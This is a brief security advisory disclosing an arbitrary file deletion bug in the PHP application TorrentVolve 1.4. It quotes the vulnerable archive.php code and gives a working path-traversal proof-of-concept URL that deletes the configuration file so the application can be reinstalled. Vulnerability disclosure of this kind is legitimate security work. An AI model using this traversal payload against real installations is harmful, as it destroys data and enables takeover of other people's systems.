TorrentVolve version 1.4 suffers from an arbitrary file deletion vulnerability.
669624fda8d98361ab647d071d3ab13e5bb6c07000717bb5f7f1d45b87e8d58b
----------------------------------------------------------------------------------------------------
Name : Torrent Volve
Site : http://sourceforge.net/projects/torrentvolve/
Down : http://sourceforge.net/project/showfiles.php?group_id=179905&package_id=207933&release_id=476030
----------------------------------------------------------------------------------------------------
Found By : br0ly
Made in : Brasil
Contact : br0ly[dot]Code[at]gmail[dot]com
----------------------------------------------------------------------------------------------------
Description:
Bug : Delete Arbitrary file.
Look this in: archive.php; Lines 194 - 199
if(isset($_GET['deleteTorrent'])) {
//delete Torrent from file system
unlink($userDir . '/' . $_GET['deleteTorrent']);
echo ' <div class="divStatus">' . $_GET['deleteTorrent'] . ' deleted.</div>' . "\n";
}
Then after login we can delete files, if you delete the configuration file you can install the script again.
----------------------------------------------------------------------------------------------------
P0c:
http://localhost/Scripts/torrentvolve/archive.php?deleteTorrent=../../../config/configuration.xml
To install again go to:
http://localhost/Scripts/torrentvolve/
OBS: need register_globals=on;
----------------------------------------------------------------------------------------------------